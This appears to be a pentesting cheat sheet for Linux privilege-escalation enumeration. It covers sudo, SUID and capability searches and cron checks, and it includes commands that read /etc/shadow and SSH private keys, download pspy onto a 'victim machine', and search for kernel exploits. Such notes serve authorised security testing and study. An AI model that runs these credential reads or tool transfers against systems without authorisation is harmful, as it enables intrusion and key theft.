# Linux

## Online Resources

{% embed url="https://wadcoms.github.io/" %}

{% embed url="https://gtfobins.github.io/" %}

## Points of Interest

### Sudo Things

{% code overflow="wrap" fullWidth="true" %}

```
sudo -l
sudo -V | grep -i "sudo ver"
```

{% endcode %}

### System Information

{% code overflow="wrap" fullWidth="true" %}

```
Basic system information: uname -a
CPU information: lscpu
Disk information: lsblk
USB information: lsusb
Distribution release: cat /etc/issue

Network: ss -nltp
```

{% endcode %}

### User Roles

{% code overflow="wrap" fullWidth="true" %}

```
id
groups
```

{% endcode %}

### Crontab

{% code overflow="wrap" fullWidth="true" %}

```
crontab -l
cat /etc/crontab

ls -lah /etc/cron.*
grep -i "CRON" /var/log/syslog
```

{% endcode %}

### Special Bits

{% code overflow="wrap" fullWidth="true" %}

```
find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
```

{% endcode %}

### Interesting Files

<pre data-overflow="wrap" data-full-width="true"><code>cat /etc/passwd
cat /etc/shadow
cat /etc/hosts
ls -la /var/www
ls -la /opt

cat /root/.ssh/authorized_keys
cat /root/.ssh/id_rsa
cat /home/&#x3C;user>/.ssh/id_rsa
cat /home/&#x3C;user>/.ssh/id_ecdsa
cat /home/&#x3C;user>/.ssh/authorized_keys

find / -name config.php -type f 2>/dev/null
find / -name doas.conf -type f 2>/dev/null
find / -name 'apache*' -type d 2>/dev/null

find / -name '*.txt' -type f 2>/dev/null
find / -name '*.sh' -type f 2>/dev/null
find / -name '.ht*' -type f 2>/dev/null

find / -name id_rsa -type f 2>/dev/null
find / -name id_ecdsa -type f 2>/dev/null
find / -name authorized_keys -type f 2>/dev/null

find /home/ -name local.txt -type f 2>/dev/null
find /root/ -name proof.txt -type f 2>/dev/null
find / -name local.txt -type f 2>/dev/null
find / -name proof.txt -type f 2>/dev/null
</code></pre>

### Writable Directories

{% code overflow="wrap" fullWidth="true" %}

```
find / -writable -type d 2>/dev/null
```

{% endcode %}

### Catch Repeating Processes

{% code overflow="wrap" fullWidth="true" %}

```
watch -n 1 "ps aux"
watch -n 1 "ps aux | grep -i <keyword>"

while sleep 1; do ps aux; done
while sleep 1; do ps aux | grep -i <keyword>; done
```

{% endcode %}

### Monitoring Processes with PsPy

{% code overflow="wrap" fullWidth="true" %}

```
On Kali Machine:
 wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
 python3 -m http.server 80
 
On Victim Machine:
 wget http://192.168.45.200/pspy64 && chmod +x pspy64
 ./pspy64
```

{% endcode %}

### Reading Binaries

<pre data-overflow="wrap" data-full-width="true"><code>strings &#x3C;file>
</code></pre>

### Finding Kernel Exploits

{% code overflow="wrap" fullWidth="true" %}

```
SearchSploit:
    searchsploit <keyword>
    searchsploit -m <EDB-ID>

For Kernel Vulnerabilities:
    searchsploit "linux kernel <distro version> Local Privilege Escalation" | grep "<kernel versions>"
    
    <distro version> = output of cat /etc/issue
    <kernel versions> = output of uname -r
    
    Example: searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v "< 4.4.0" | grep -v "4.8"
```

{% endcode %}

## Automated Enumeration

### LinPeas

{% code overflow="wrap" fullWidth="true" %}

```
On the Attacker:
    /usr/share/peass/linpeas/linpeas.sh
    /usr/share/peass/linpeas/linpeas_small.sh
    wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/linpeas.sh
    
Transfer the chosen script to the target system
Run the script and review its output
```

{% endcode %}


